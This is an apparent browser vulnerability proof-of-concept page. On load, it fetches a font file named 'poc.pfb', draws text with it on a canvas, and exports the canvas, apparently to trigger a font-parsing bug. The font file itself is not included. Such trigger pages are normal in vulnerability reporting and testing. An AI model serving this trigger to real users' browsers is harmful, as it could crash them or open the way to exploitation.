<html>
<head>
<script>
    function trigger() {
        const testFontFace = new FontFace("TestFont", "url(poc.pfb)");
        const testCanvas = document.createElement("canvas");
        testCanvas.width = 1;
        testCanvas.height = 1;
        testCanvas.setAttribute("style", "font-family: TestFont; -webkit-font-smoothing: none;");
        document.body.append(testCanvas);
        testFontFace.load().then(function(testFontFaceLoaded) {
            document.fonts.add(testFontFaceLoaded);
            document.fonts.ready.then(function() {
                var ctx = testCanvas.getContext("2d");
                ctx.font = "10px TestFont";
                ctx.fillText("A", 10, 10);
                testCanvas.toDataURL();
            });
            document.close();
        })["catch"](function(A) {
        });
    }
</script>
</head>
<body>
<script>
  trigger();
</script>
</body>
</html>
